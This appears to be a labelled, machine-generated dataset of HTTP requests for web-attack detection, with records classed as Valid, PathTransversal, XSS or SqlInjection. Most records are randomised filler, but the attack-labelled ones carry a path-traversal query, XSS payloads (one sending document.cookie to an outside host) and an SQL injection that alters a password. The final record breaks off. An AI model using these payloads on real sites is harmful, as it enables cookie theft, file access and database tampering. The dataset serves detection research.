~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26104
Start - Id: 13983
class: Valid
GET /tuenrtttS9oset/etcuR@O8WLesperlbetweend5/6YqOm/lu9yie/wnmf9ietnwiqapItyz.nsf?X0cmdservicesRQK8u=iEnStetncveceis HTTP/1.0
Host: 238.230.4.46
Connection: close
Accept: audio/x-wav, text/xml
Accept-Charset: cp-950, x-mac-arabic, x-mac-korean;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8293
Client-ip: 110.118.82.42
Cookie: hrqgt1rH=e9-GjeO8C.YA;sctxi=tfwqPsuizltadawhere;EICldpmlPwKA=rTU6f5.NlR
Cookie2: $Version="37"
Date: Fri, 01 Aug 08 11:23:02 UTC
ETag: W/"6KbK8kfqsj7xhsY9n06"
Expect: 100-continue
From: s8hvitrs@euHho.st
If-Modified-Since: Wed, 26 Aug 09 10:24:27 CET
If-Unmodified-Since: Wed, 21 Sep 05 09:58:22 GMT
If-Match: *
If-None-Match: *
If-Range: ".IPKjer5XO2NbZz"
Max-Forwards: 4074
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest algorithm=MD5
Range: -410
Referer: /alyit/e85edre/Saridt.avi
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.1 (Windows; U; Win98 6.9; ri-ds; rv:8.8.1) Gecko/59105980
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: HTTP/9.6 www.qoeyRc.html:579
Transfer-Encoding: compress
Upgrade: tiowa/3.9, SsnfV/0.1
Warning: 751 www.ninm.html "eskobLtz" 
X-Forwarded-For: 147.149.106.113
X-Serial-Number: 738264285065396
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13983
Start - Id: 14049
class: Valid
GET /emZ0CSGjkieLcxf/hBNxZdM7NefA/nKzJNaq23/ip@kIqgnjiKJo/ncRqDB-2nQMUMf4/l2pclhvn1b/ieenoo/Stfhtif2guh46nr/kpcoWott/pjAy4JaB.aspx? HTTP/1.0
Host: 192.137.137.29:80
Connection: keep-alive
Accept: audio/*;q=0.0, application/x-tar;q=0.5, video/*;q=0.1
Accept-Charset: windows-1258, x-mac-arabic, iso-8859-15, x-mac-hebrew;q=0.2, windows-1255;q=0.0
Accept-Encoding: 
Accept-Language: ci-f, s1oh-smO5wtg, iooreh-niyeiqs;q=0.0, euAn3io-i6ueRek
Cache-Control: only-if-cached
Client-ip: 120.124.48.202
Cookie: YPFtIaZDoor=7389236637
Cookie2: $Version="0"
Date: Sat, 20 Jun 09 20:51:57 GMT
ETag: "oVDHGEif@LxUzuRnu5"
Expect: 100-continue
From: jxdfn@dtslsmfys.ch
If-Modified-Since: Tue, 03 Jun 08 13:36:22 GMT
If-Unmodified-Since: Tue, 25 Jul 06 19:26:17 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Aug 08 06:15:40 UTC
Max-Forwards: 09
MIME-Version: 3.7
Pragma: e2='ie7lv'
Proxy-Authorization: NTLM OG9zZXlhOHNlZWxlaXRDNGpydGFFb05sNUUxdHI0YWRUczhuOHVJbGh5
Authorization: NTLM dG1zem9sbWl0dGFhdGVlb291Y2VsbGV1OGQ0cm9ubGVpWEMzMw==
Range: 477582-,-394214
Referer: /badecE/sdorl/Othecile.tiff
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: eTeteemt/9.2
UA-CPU: MIPS
UA-Disp: 091,777,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8443x481
Via: 0.4 38.206.45.139, 7.3 210.174.65.80
Transfer-Encoding: compress
Upgrade: iQr/6.2
Warning: 826 60.35.56.208 "d0eihicmspnehASyl" "Tue, 15 Dec 09 11:56:23 GMT"
X-Forwarded-For: 241.125.208.47
X-Serial-Number: 0043438224132828242
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14049
Start - Id: 30180
class: Valid
GET /p4/efXqhXmPi6pu@dHcCX/insertu4o3LL-.Crvchild/dkd6uu.png?tdigl=7608531632&1Aiurshr9Oraheg=43702&IbbXR=heefoarzpzae1orin&EoetZnhdons8=%3Dn%27pos3y%7ChdO%3E%29wa+Q HTTP/1.1
Host: www.lpec.com
Connection: h19oa
Accept: audio/x-wav;q=0.8, video/*
Accept-Charset: hz-gb-2312, iso-8859-2;q=0.8
Accept-Encoding: compress, deflate, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 210.246.213.241
Cookie: faarualH1vdt=shtGbtrrmochaaesstbv;9MMWBtincludeki=ttonnbk
Cookie2: $Version="502"
Date: Thu, 22 Jan 09 24:37:13 CET
ETag: "8cieUy-vSOpwIbKZ"
Expect: 100-continue
From: n30oip@sye2lHtos.gov
If-Modified-Since: Sun, 22 Feb 09 21:40:58 UTC
If-Unmodified-Since: Wed, 02 Sep 09 15:50:56 CET
If-Match: *
If-None-Match: *
If-Range: "THDDwijevjs65ii7-7R"
Max-Forwards: 146
MIME-Version: 5.5
Pragma: s0rb='sa1iwEsl'
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: Digest opaque="ck5nessp"
Range: -5461,-03305,-419
Referer: /sNcf8i/taa8/soo5mha/yuoap41u.png
TE: deflate
Trailer: Connection
User-Agent: Mozilla/2.0 (Windows; U; Win98 2.8; is-ti; rv:4.7.4) Gecko/70546889
UA-CPU: x86
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: HTTP/4.2 www.dwdeiu.gif, HTTP/8.5 www.a2ydNa.css, xeeylr/4.2 www.grygt.tiff
Transfer-Encoding: identity
Upgrade: delna/9.9, tta/9.0
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 5387143927109477044
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30180
Start - Id: 3922
class: Valid
POST /ePccV1hqTCl9FehA/rdu/sdIyeanao/e5dIsSMW/aniTr7trBiHtecy/auetextcandSsQ/sa@OvIHV5g40x6K_sVAX/twaonnicwD/Tpiselect/gnull@B/d@cTvawlz4REcoq.gif? HTTP/1.1
Content-Length: 111
Content-Language: eeu,ttiag
Content-Encoding: identity
Content-Location: http://dpnnc.uk/ciaydg/odpn1/ssda.htm
Content-MD5: emNuRW5lbnNuZWRUQmlscQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Oct 06 02:02:46 UTC
Last-Modified: Mon, 04 May 09 08:20:08 CET
Host: 8.21.193.52
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 10.168.12.118
Cookie: coh8i=gELh1TB2
Cookie2: $Version="1"
Date: Wed, 10 Oct 07 19:56:05 GMT
ETag: W/"6pS4._@YpuZM1-aKk"
Expect: 100-continue
From: piNm@lsgw.org
If-Modified-Since: Thu, 30 Jun 05 19:27:27 CET
If-Unmodified-Since: Wed, 20 Sep 06 08:03:30 CET
If-Match: *
If-None-Match: *
If-Range: ".B-vA34q4PsKns0SwHzb"
Max-Forwards: 41
MIME-Version: 6.3
Pragma: ntftfa=0nne
Proxy-Authorization: sgsp amTcwnn=Vsriueni
Authorization: hmtft hEuee=aDtyt
Range: 3-99,-785520,15516-
Referer: /ds2t/Liag6f/ce0ty8e.cgi
TE: trailers
Trailer: Cache-Control
User-Agent: ihsts (adcDcrOutp)
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 698x5679
Via: 5.9 www.ueNane.js:67867, 1d1/3.5 www.n6tnpd.css
Transfer-Encoding: gzip
Upgrade: benr/6.9, ceas/6.6, oe8a/3.8, 3meta/5.3
Warning: 884 93.144.26.206:701 "e5urtc8hhy7ie8rxs" 
X-Forwarded-For: 151.227.134.198
X-Serial-Number: 40075996099747963
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

4zRkTaolKe=Vnlobn7o&wf=-iwtsg&natrivbrsnp=35&ieiZeyz=' o&rTtfdoYenitoe=sHs&aytleh=isnFaodHc&terNnsat=qa?ixn

End - Id: 3922
Start - Id: 15415
class: Valid
GET /aeieTet357hd/n.ji/iAeNacurated9hOUe/Wo_7/6rcpP-8Lf1J/v6ET5a/sEHz3/aibZKyXZR3u6riOGV/0rb39dicsw.php4?eeCIr=IItmep22nnevze HTTP/1.0
Host: www.tipynh.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 42.68.0.83
Cookie: Ttnd74mai=733899;sxwrjs=%telnete;mecaehi8aPhrn3g=ubc wheremr;6lallRwp-IpEk=bheg;uM6tttn=ow0K0;hstoE=56313
Cookie2: $Version="6"
Date: Sat, 13 Feb 10 01:23:28 UTC
ETag: "OQbk0Cpc5Wa4lisgEtN"
Expect: esShshda=Elxtd
From: hreEo@mhtthLrava.org
If-Modified-Since: Sat, 10 Jan 09 16:04:07 UTC
If-Unmodified-Since: Wed, 06 Oct 04 24:55:24 GMT
If-Match: *
If-None-Match: "AoALLhdjAt@_5OJ7l"
If-Range: "XYZ9Ih9CYlfSEqFsku"
Max-Forwards: 81
MIME-Version: 7.9
Pragma: ea='rNkwtt2'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM b2dHbG42cEs5c3MzYXJpOG94OHFIcXR0dHNlbWFMbG1pMDVld3dhcm9ubg==
Range: -590219
Referer: http://www.sr1eafm.de/tsrbhb/ldtre6ft/6rdlh/dieilAe.swf
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/6.1 (compatible; MSIE 4.8; Linux i386; rhfAtoetm6)
UA-CPU: Sparc
UA-Disp: 842,1582,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 743x937
Via: 0.3 www.h9Itpo.shtml, FTP/6.1 124.73.49.41, 2.2 www.q0en.html
Transfer-Encoding: e6ult
Upgrade: dAn/4.5, 3mn4ds/7.1, gos/5.5, zcote/1.9, sxOwze/3.3
Warning: 464 www.mnaweo.js "oneuxm" "Sat, 24 Jan 04 18:49:21 UTC"
X-Forwarded-For: 197.234.139.35
X-Serial-Number: 62076260376373
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15415
Start - Id: 17689
class: Valid
GET /mailwUh1uN8a/vwujKlQT0nSS1D2F/rqOdwDnSohNQL/tdREWrNcMNmAmO8rZ/stt3eeerceId/xVjTtlDVmail@/gBdVrSebLRqd/hrpst83saa4flacril/d3DesX2f3zxDn/mdeDlinat/4e1nEe1n18ceeeen8h.asmx?uraRzAa=euus&a3Usedsszr=284&yl1eridAc=304885934 HTTP/1.1
Host: www.nfghi3eea.net
Connection: hfm8
Accept: */*;q=0.3
Accept-Charset: gb2312;q=0.4, iso-2022-jp;q=0.9, cp-936, x-mac-hebrew;q=0.5, cp-932
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 121.32.229.227
Cookie: 4cbee=5;la=5;BLT96uwmetaPcs=ix'Rtin9oia3iEn;suuaL29Abo=7007612;ee4doSevrEoet=oQ.-lGomQm
Cookie2: $Version="422"
Date: Sun, 19 Sep 04 23:20:11 UTC
ETag: W/"xivTxO.70W_zBoLE"
Expect: EL5sEaet=uget
From: ham2@rhhtcs.de
If-Modified-Since: Wed, 29 Sep 04 22:15:32 GMT
If-Unmodified-Since: Mon, 06 Oct 08 09:05:37 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Oct 07 06:51:25 GMT
Max-Forwards: 5707
MIME-Version: 8.8
Pragma: hnj9rr3r='joes'
Proxy-Authorization: ds5n eodzhhx=stpesdru
Authorization: d4Khe9 teh4oer=Rvins4
Range: 0-,07-
Referer: /jtqEuao/uT34tiRl/bioaqiuo.jsp
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.7 (compatible; Konqueror/0.9; Linux i586; ee6reaart7)
UA-CPU: x86
UA-Disp: 4852,629,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5218x1595
Via: 3.9 www.cexeexew.shtml
Transfer-Encoding: identity
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 359 www.i8Euno.jpeg "uita6ivdt8" 
X-Forwarded-For: 36.178.47.35
X-Serial-Number: 1990528944468
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 17689
Start - Id: 22732
class: Valid
GET /JallJ/loolmtufitcbA/t5aii/nV9Iq/no2JKW8Hn7/snhefoeeyUlLg2oosakd/eMUuHi/qzoptN5/mf9n2ue8h/nmZ893sVDNl/zrtbYlh/nlbenr4.jpg? HTTP/1.1
Host: www.omsche.ch
Connection: close
Accept: image/jpeg
Accept-Charset: iso-8859-6;q=0.4, windows-1254
Accept-Encoding: compress, compress
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 108.170.36.18
Cookie: liss=81;mdysosnoofDsb=3737858;c2hhe2eiri=ha 6
Cookie2: $Version="3"
Date: Tue, 28 Jul 09 18:02:45 GMT
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: loaig=e0ueme
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Sat, 22 Aug 09 07:26:25 UTC
If-Unmodified-Since: Sun, 10 Jul 05 10:32:28 GMT
If-Match: "Rx@ik0exFPaWLwbnEbc"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 2.1
Pragma: eo0=a
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: NTLM bTN5b3RpaGFzZnRpdjZhYmFuZWlkZGlzTHl1YWNuckVwaWV0bw==
Range: -59538
Referer: /nszeb/lhiN/ieAosOy/1n7rs/oenahri4.wmn
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 5.4; nx-pW; rv:2.2.1) Gecko/76237547
UA-CPU: MIPS
UA-Disp: 482,155,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: 3.1 221.147.16.78, 4.8 125.249.131.87, 7.7 www.ehfB.css
Transfer-Encoding: compress
Upgrade: wlsnh/7.3, rcrs/2.4, butta/6.0
Warning: 405 www.hedts.tiff "9neamsw9eeTeirmfn" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22732
Start - Id: 36100
class: PathTransversal
GET /dnrpedcnRtteqFrt/bNihilearpneal/nPphpTxusrF/ehIkjXB08O_a/mer/tiXpty9.5VYA/iAKU/nUNWvDa/ohkwa7rhhtabh/iZ3uhzCjHVDS5sA.dll?ilhhmwdinme=%3Efelt&W6wEz=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&kTibhmea9e=603544758&rotoh5vtkmeh=erUconnectT&l2Eroqoc=00&wmsrltuatte=si1sno%3Dl6N&rvonawE0fecnbnt=wydt%5Cepf&etnS3juodea9=sabseennmtrta7 HTTP/1.1
Host: 202.144.151.77:80
Connection: esyi
Accept: */*;q=0.0
Accept-Charset: euc-jp, iso-8859-7;q=0.5, windows-1257, x-mac-chinesetrad
Accept-Encoding: *;q=0.6
Accept-Language: 9egtoae-TMEm, eyror-5SiHfh;q=0.6
Cache-Control: max-stale
Client-ip: 100.85.62.104
Cookie: ahadotoetee=0060;Ae9aT=hXx3Sc5rAjj;neuoeenieeec=eaeuhtr5a;hpo=gL.RCWJhZ4p6;tesiIhdge=Acgw 
Cookie2: $Version="1"
Date: Mon, 03 Jul 06 24:16:18 GMT
ETag: W/"Og53tD5Fr.sQ6S3"
Expect: 100-continue
From: lemgP@orThcs1lso.de
If-Modified-Since: Sat, 28 Jun 08 08:56:47 GMT
If-Unmodified-Since: Tue, 16 Jan 07 01:24:24 CET
If-Match: "9D4fY42SD-lYq8pqMe"
If-None-Match: "IYfKKcGoZz4j.DmoV"
If-Range: Fri, 26 Oct 07 18:26:55 GMT
Max-Forwards: 864
MIME-Version: 3.5
Pragma: xs=t
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Basic bWVjZzppdHVnb2Y=
Range: 78-
Referer: /hOybl/0gde.doc
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/3.9 (Machintosh; U; Mac OS X 6.4; ah-aE; rv:9.2.3) Gecko/82092318
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6563x796
Via: FTP/1.1 www.k5ctee.htm, 7.0 120.124.161.100:0, 5.5 www.niAni.js
Transfer-Encoding: identity
Upgrade: Fd1sk/0.3
Warning: 397 214.252.198.233:945 "AtTaftF9tdtewstae" "Tue, 11 Nov 08 15:03:35 UTC"
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36100
Start - Id: 11470
class: Valid
GET /KyRyOGEnxzoq2sam/aBPH2Spv8A@Z.nyqRx/uxeoNzd/nnhslstRedaanE/oNBoe0frshtjwtjE2ms/a.byHhyau3l_/28YhH9h9yPUhrtpnegem/Moosock_streamrPlKZnJ.exe?msmelpssmZsiaro=8801058423&Nm=cItenhess2sdrnneq&Ueyca6sittrvwor=Waid&pjaasherdst=ocpise%3A%27ir%3Bmc&thuae3gichIir=emFgnytdihbs5e&alui=rar HTTP/1.1
Host: www.iayes0li.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: csi-H5oao, tmt-hp8;q=0.6, dAa-3rhsaerr, raneaany-Ei6etan2
Cache-Control: only-if-cached
Client-ip: 18.47.44.96
Cookie: picuopt8-Q=eild3tsgtt+t;7nid=dtrTleuaks
Cookie2: $Version="290"
Date: Sun, 08 Oct 06 05:39:20 CET
ETag: W/"uok78NCd1DvlIieuna"
Expect: Ltee=5hao
From: oohw@halud.org
If-Modified-Since: Sun, 15 Feb 04 04:05:10 CET
If-Unmodified-Since: Tue, 14 Dec 04 02:14:06 UTC
If-Match: "u8euFD606SHUFRq_ea_"
If-None-Match: "tCx4EYny-T2y59bHZ"
If-Range: "GhHeQ65@oF_uP4cC4M"
Max-Forwards: 74
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: otl1hQ 7eaee=ntgy
Authorization: Basic WlZSNHJjZTp2cGxnZWVo
Range: 31-
Referer: http://www.n2ade.be/eqtl/pa9hpmi/aurlsere.dll
TE: trailers
Trailer: From
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 0.3; ni-an; rv:1.7.8) Gecko/88911135
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9366x217
Via: feiA/5.0 www.tadpc.tiff, 0.7 www.stHlc.png, tcwas/9.8 www.ispghsf.js
Transfer-Encoding: identity
Upgrade: au1/2.1, OghB/7.4, cgcvbt/8.8, aewhh/9.8
Warning: 637 201.192.41.129 "rnbehkrn" 
X-Forwarded-For: 54.109.53.253
X-Serial-Number: 684447475496
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11470
Start - Id: 30460
class: Valid
GET /bEeoixoo8ui9e040e/fkAzuHwGiAp/zaoahd5ZeEsgds.cgi?yo1gtlS=gnkmaiambua&dpieem4Htatnwa=0432462&gDzPts=13876&kebeatk=993038&CVitBuqX1XL-=4028833&e4opataZqio=ac3AgkUC&v5aecgiet=dcR%2FbrdfohRStznulllrwna HTTP/1.1
Host: www.Nf4ee.net:21288
Connection: zsxcQee
Accept: video/mpeg;q=0.7, image/png;q=0.6, text/plain
Accept-Charset: windows-1253, windows-1252;q=0.1, x-mac-chinesesimp;q=0.6, x-mac-chinesesimp, iso-8859-15;q=0.2
Accept-Encoding: identity;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 250.163.226.249
Cookie: fen=y48E_JT0sdkL;s2eIuTrra5=gxpeu;1iTn3erkcTdUn= o
Cookie2: $Version="5"
Date: Sun, 30 Aug 09 07:14:05 CET
ETag: "Kc8eIF.D6XHob.jUc"
Expect: 100-continue
From: suis@mcSpz.gov
If-Modified-Since: Sat, 21 Jun 08 15:02:32 UTC
If-Unmodified-Since: Tue, 19 Aug 08 14:25:30 UTC
If-Match: ".XLFIn_1svuO3HZco"
If-None-Match: "k5H2tt3T37EfXmRB@1NR"
If-Range: Tue, 12 Jan 10 20:54:07 UTC
Max-Forwards: 1
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic N2VvbGdhbTphNzll
Authorization: NTLM anVjdGNhcmRnUml0ZTIxdG5mbUhqejk2aGl0ZGVXdXRub05kSQ==
Range: 9-01848
Referer: /lesiolg/z3eqwc/pHdfe/i8jEteey.asmx
TE: gzip,deflate,trailers
Trailer: Cache-Control
User-Agent: rtibehfue/8.0.4
UA-CPU: x86
UA-Disp: 2897,898,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 710x3564
Via: 4.0 163.180.108.157, 8.5 171.170.130.89
Transfer-Encoding: identity
Upgrade: dksM/4.0, egtr/5.6, at1f/2.7, Ruilnr/5.9, epf4h3/8.8
Warning: 372 6.28.172.137 "NiolntT" "Sat, 08 Mar 08 01:32:29 UTC"
X-Forwarded-For: 216.219.0.201
X-Serial-Number: 839589841918771
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30460
Start - Id: 46679
class: XSS
GET /ottAaisroiu/QPXconnectZ4V/P26hzNcghebqt/FvbscriptINFKxiGlQcM/na7fch4ons3qsnepa/sqh@qCOxA6Owxq7T/prreftu/oXQO3aaNF.aSLewphJh/zooITgZ@QVc/mEXF9-k_3/mv-B-TI.jpg?Ek0@h=28579&Ot=mno95sHB6P HTTP/1.1
Host: 22.45.212.25
Connection: close
Accept: */*
Accept-Charset: iso-8859-5;q=0.8, x-mac-japanese, windows-1253;q=0.5, windows-1250;q=0.9, us-ascii;q=0.5
Accept-Encoding: 
Accept-Language: pewrnt-no, meB-he;q=0.9, tecaeee2-plgt4rr8;q=0.8
Cache-Control: no-store
Client-ip: 113.189.52.52
Cookie: Emfed41sc=tri;8;Nsllne4mg=<bgsound     src    =   "javascript:    [alert  ('isip');] " >;GstOe=tPBBxvd
Cookie2: $Version="94"
Date: Wed, 15 Mar 06 22:34:24 UTC
ETag: "LbLGWBdKI72rB3GO@"
Expect: 100-continue
From: ekionh@nouustph.biz
If-Modified-Since: Mon, 25 May 09 15:24:36 UTC
If-Unmodified-Since: Sun, 20 Apr 08 17:05:50 GMT
If-Match: "zGsUOWWOtrO9udU"
If-None-Match: *
If-Range: "NlMTaOPuCi18rE5lem"
Max-Forwards: 2605
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: 5taRoo rnn5=c3tA9
Authorization: Digest cnonce="3asgi8ar"
Range: 2194-5461,312-2895
Referer: /tfAee/iFyj/csfj1e/oeDe.jsp
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 0.9; tp-8t; rv:3.0.0) Gecko/49175106
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 630x4242
Via: HTTP/5.9 134.189.230.91, FTP/6.5 241.178.166.146
Transfer-Encoding: gzip
Upgrade: reeaDa/8.7, ddJ/0.9, ft5C/5.8, 5lwo/3.8
Warning: 215 182.199.44.60 "ndteejhnqoKy4mea" "Sun, 18 Oct 09 09:17:52 UTC"
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 49725305842038917
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46679
Start - Id: 47536
class: XSS
GET /9l7hL_ntt@Y/s3rWy.cgi?tx=634147614&EbMaeionhessboh=32687&Mn=9911882&Nbgale0=%3C%21--+--+--%3E%3Cscript+%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.taettete.com%2Fcgi-bin%2Fenleie.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E%3C%21--+--+--%3E&6oee=xtermeTnDz3Chtnac&9oitp=24&heTiuuinsn=+t&XbWhH2wmw=x&nasf=2Pm7e9k&oiasnn=454380&sepa4tt5UnrtK1=el&mpufruja0w=iTZ&YbsystemfxQ=o.M6xsIejm9 HTTP/1.0
Host: 52.166.253.76
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: t-isa;q=0.9, gunams-t45, oSls-gtt;q=0.1
Cache-Control: only-if-cached
Client-ip: 37.55.220.136
Cookie: dmreo=eLecu;52blc9lb8nessid=i%rv
Cookie2: $Version="61"
Date: Fri, 21 Dec 07 03:22:37 UTC
ETag: "G60koYB8vEN@YsEWc3"
Expect: pnInt
From: rxai5au@cfrdhneel.st
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Wed, 25 Feb 04 14:53:05 UTC
If-Match: *
If-None-Match: "NTh@obswfwD-5m3Y"
If-Range: "zbD6bwp@EhO9Zn0"
Max-Forwards: 2
MIME-Version: 0.8
Pragma: 9e=gitie
Proxy-Authorization: NTLM dGx0ZGViczZjR2lwUjhibmlPc3RybGV4dEZldGFycmpvVGhuag==
Authorization: Irtno s0ohameh=vleani
Range: 924-,916951-
Referer: /xtmiioaw/hrgaiAyt.doc
TE: gzip,deflate
Trailer: TE
User-Agent: Mozilla/9.0 (Windows; U; Win98 1.0; fo-ur; rv:5.3.2) Gecko/54142600
UA-CPU: 68000
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: 7.5 39.34.171.134, 0.0 www.hfnpceem.gif
Transfer-Encoding: a7ut; derLnT=bsferx
Upgrade: ehzL/0.2, mtlah/0.2, jsco/5.4, toi/4.5
Warning: 758 232.178.55.106 "aerbantiefsyete" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47536
Start - Id: 11069
class: Valid
GET /yoauaemg/dv/RdorinOP6U48RAxO/iS5k83cVU7mL/f1ep4AQCaformtXD./p8EdN94.shtml?cnrvo=5Vlibapasswd%27+2Rylo%2Buscripti%3C&w20qweoG=ehTkacgaFo9l HTTP/1.0
Host: 142.159.111.230
Connection: eoqyl
Accept: */*;q=0.4
Accept-Charset: iso-8859-8;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: c='ehi9t'
Client-ip: 224.189.199.226
Cookie: zndDsoeeoacw=~ss[nlsA:zg(d
Cookie2: $Version="39"
Date: Sun, 26 Mar 06 23:33:24 GMT
ETag: "AqBXbwZ5N_O6oxtsdB"
Expect: SqfStme=ipwrie;iayodqto
From: irc6ruhx@rhorr.ch
If-Modified-Since: Sun, 16 Dec 07 10:03:55 GMT
If-Unmodified-Since: Sat, 07 Apr 07 18:50:59 CET
If-Match: *
If-None-Match: "IdaJ4j8bnZ6e1eRkZr"
If-Range: Tue, 25 May 04 03:33:10 GMT
Max-Forwards: 9
MIME-Version: 4.7
Pragma: dlb=asmGln
Proxy-Authorization: Digest qop=auth-int
Authorization: phnoD lstjrmG=mmos
Range: -26420,731526-452811,442365-468
Referer: /hntk/tt5cigbe/sydABen.mpg
TE: trailers
Trailer: Via
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 2.3; ma-aA; rv:0.1.6) Gecko/01054505
UA-CPU: x86
UA-Disp: 0717,4017,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 948x5637
Via: nimeer/4.2 www.llgeTllj.tiff, HTTP/1.8 198.94.90.246
Transfer-Encoding: identity
Upgrade: nmyio/6.6
Warning: 864 42.215.124.198 "smicegomrl2AdEeez" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 648657814451
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11069
Start - Id: 41648
class: SqlInjection
GET /e66rsbQa2Tjk/m@m_rE7jM28null/hnbTrKrp/e6ntsuEe5/.eSzP1PLX/oApfrseocs/seoe.pl?tsAoai6ezr=%3Balter+table+++++larolate++++set++++password++++%3D+%27ed%27+where++name+++%3D+%27citewmsn%27%3B&QHhzbEM=aa&oawseekneiajT=06947&8u8eb=colI%3Ctxilom+ah&eb=aeve9eit&ltcesnvot=rldtzl&lxidtlst5Nt=Bo HTTP/1.1
Host: 93.62.159.207:80
Connection: uyxai7
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.9, x-mac-cyrillic, x-mac-ce;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8807
Client-ip: 91.9.66.11
Cookie: D488=90697375;1wu2=13
Cookie2: $Version="52"
Date: Tue, 01 Apr 08 14:50:11 CET
ETag: W/"DYrqCWSJ5vu8_ST"
Expect: tt48=sne4our
From: vlIol@haea.org
If-Modified-Since: Mon, 20 Aug 07 05:57:30 CET
If-Unmodified-Since: Fri, 10 Nov 06 03:57:54 GMT
If-Match: "Vpnm6_tx@bTkEsTmda"
If-None-Match: *
If-Range: "b7a4y_incQ3X85IN"
Max-Forwards: 39
MIME-Version: 7.4
